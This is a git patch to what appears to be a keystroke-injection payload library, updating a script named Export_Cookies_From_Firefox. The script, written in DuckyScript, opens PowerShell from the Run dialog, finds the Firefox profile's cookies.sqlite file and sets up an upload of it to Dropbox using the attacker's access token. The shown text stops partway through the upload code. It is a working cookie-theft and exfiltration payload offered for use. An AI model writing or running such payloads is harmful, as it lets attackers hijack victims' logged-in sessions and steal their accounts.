From 30cf14a1c00937e4c39951164a9158f0a1342594 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:29:47 -0400
Subject: [PATCH] Update payload.txt

---
 .../Export_Cookies_From_Firefox/payload.txt     | 17 +++++------------
 1 file changed, 5 insertions(+), 12 deletions(-)

diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c..98bcbaa 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -16,31 +16,24 @@ REM     - Firefox must be installed
 REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
 DEFINE DROPBOX_ACCESS_TOKEN "example"
 
-
-DELAY 1000
+DEFAULT_DELAY 500
 GUI r
-DELAY 500
-STRING powershell
-DELAY 500
-ENTER
+STRINGLN powershell
 DELAY 2000
 
 
 REM Get cookies DB path
-STRINGLN
+STRINGLN_BLOCK
     $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
     $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
-
     $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
-
 END_STRINGLN
 
 REM Setting about exfiltration
-STRING $accessToken = 
-STRING DROPBOX_ACCESS_TOKEN
+STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
 ENTER
 
-STRINGLN
+STRINGLN_BLOCK
     $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
     
     $dropboxFilePath = "/cookies_exported.sqlite"